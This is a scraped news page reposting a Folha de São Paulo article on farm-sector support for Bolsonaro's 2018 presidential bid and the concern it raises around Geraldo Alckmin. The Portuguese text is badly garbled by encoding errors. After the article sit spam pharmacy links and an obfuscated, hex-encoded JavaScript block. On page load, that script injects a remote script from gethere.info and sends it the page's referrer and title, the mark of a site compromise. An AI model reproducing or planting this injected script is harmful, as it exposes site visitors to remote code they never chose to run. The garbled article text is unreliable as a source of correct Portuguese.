Nova pagina 1

AlianA�a de ruralistas com Bolsonaro preocupa Alckmin

‘Agro A� 95%’ a favor do deputado, diz consultor de tucanoA�para a A?rea

AA� consolidaA�A?o da prA�-candiO governador de SA?o Paulo, Geraldo Alckmin, discursa na ConvenA�A?o Nacional do PSDB, em BrasA�lia, apA?s ser eleito novo presidente do partido; Alckmin aparece em quarto lugar em pesquisa do Datafolhadatura ao Planalto de Jair Bolsonaro (PSC) no agronegA?cio acendeu um alerta no entorno de Geraldo Alckmin, governador de SA?o Paulo e presidenciA?vel pelo PSDB, partido que historicamente recebe o apoio do setor.

“Hoje o agro A� 95% Bolsonaro”, sentencia Frederico D’A?vila. Diretor da Sociedade Rural Brasileira, ele A� o principal consultor da A?rea de Alckmin.

“Como novo lA�der do PSDB na CA?mara, A� difA�cil, mas posso atestar o mesmo. A� um fenA?meno claro”, completa o tucano Nilson LeitA?o (MT), que preside a Frente Parlamentar da AgropecuA?ria, maior grupo por afinidade da Casa, com 220 integrantes de diversas legendas.

Na avaliaA�A?o deles, Bolsonaro hoje ocupa um vA?cuo deixadoA�pela centro-direitaA�junto a produtores rurais.

“Se o Geraldo continuar nessa toada, sem correr o paA�s, fazendo sA? eventos ‘nA?s-com-nA?s’ montados pelo ITV [instituto do PSDB], dando sinais dA?bios, eu digo com toda seguranA�a, como seu amigo, que seria melhor ele concorrer ao Senado, porque ganha a eleiA�A?o com facilidade e seria excelente presidente do Congresso”, diz DA?vila.

Produtor de grA?os filiado ao PP, ele A� irmA?o do prA�-candidato tucano A� sucessA?o de Alckmin Luiz Felipe D’A?vila, que hoje tende a ser tratorado em prA�vias pelo prefeito paulistano, JoA?o Doria. De 2011 a 2013, ele foi assessor especial do governador.

O sucesso de Bolsonaro estA? no discurso. “Ele fala o que o nosso pessoal quer ouvir”, diz LeitA?o. Com efeito, o presidenciA?vel foi na quarta (7) A� primeira das quatro grandes feiras agropecuA?rias do ano, o Show Rural de Cascavel (PR).

O evento recebeu tambA�m JoA?o AmoA?do (Novo) e Alvaro Dias (Podemos), prA�-candidatos na rabeira das pesquisas ora lideradas pelo deputado em cenA?rios sem Luiz InA?cio Lula da Silva.

IMPACTO

Falando A� plateia, ele prometeu criminalizar aA�A�es do MST (Movimento dos Trabalhadores Rurais Sem Terra) e ajudar na concessA?o de crA�dito rural. Foi interrompido por gritos de “mito”. Na quinta, voou a Dourados (MS), onde falaria (mal) de A�ndios para produtores locais.

O impacto potencial do apoio do agronegA?cio a qualquer candidato A� grande.

O setor estima ter 5,5 milhA�es de pessoas empregadas diretamente em sua cadeia produtiva no Brasil, o que pode parecer pouco, mas cada uma delas tem famA�lia e grande capilaridade regional, o que pode amplificar tal influA?ncia para talvez quatro ou cinco vezes mais eleitores.

Um estrategista de Bolsonaro afirmou que o trabalho de guerrilha do deputado, que viaja acompanhado do filho Eduardo e de um assessor, serA? mais bem estruturado. O marqueteiro Chico Mendez foi convidado a integrar sua equipe, mas declinou.

A CNA (ConfederaA�A?o da Agricultura e PecuA?ria do Brasil), que nA?o apoia nenhum candidato, irA? chamar os nomes no pA?reo no comeA�o da campanha para apresentar demandas: concessA?o de crA�dito para safra, seguro rural e infraestrutura de escoamento de produA�A?o.

D’A?vila acrescenta como fator favorA?vel a Bolsonaro a questA?o da seguranA�a. “O produtor estA? com medo. HA? furto de gado, de carga”, diz.

A CNA jA? identificou atA� a presenA�a de “pedA?gios do trA?fico” em hidrovias que levam soja e milho a portos do Arco Norte (AM, PA e BA).

Como o deputado usa retA?rica agressiva contra criminalidade, encontra ressonA?ncia. “Depois de abril, Alckmin terA? de engrossar o discurso”, afirma LeitA?o, que vA? chances de o tucano recuperar terreno perdido. “O brasileiro nA?o gosta tanto de agressividade, mas precisa ter seguranA�a jurA�dica para trabalhar.”

Ele reputa a “30 anos de leis socialistas” o que chama de “preconceito contra ruralista”.

D’A?vila concorda e aponta erros em SA?o Paulo que afastaram a simpatia da A?rea.

A concessA?o de A?reas a sem-terra, a demora em anunciar o veto ao projeto da “segunda sem carne” e a inaA�A?o na polA?mica sobre a exportaA�A?o de bois vivos pelo porto de Santos estA?o nessa lista.

A�Fonte: Folha SA?o Paulo

fluoxetine cheap

Female Viagra cheapest

purchase doxycycline

var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

Faça o primeiro comentário a "AlianA�a de ruralistas com Bolsonaro preocupa Alckmin"

Comentar

O seu endereço de email não será publicado.


*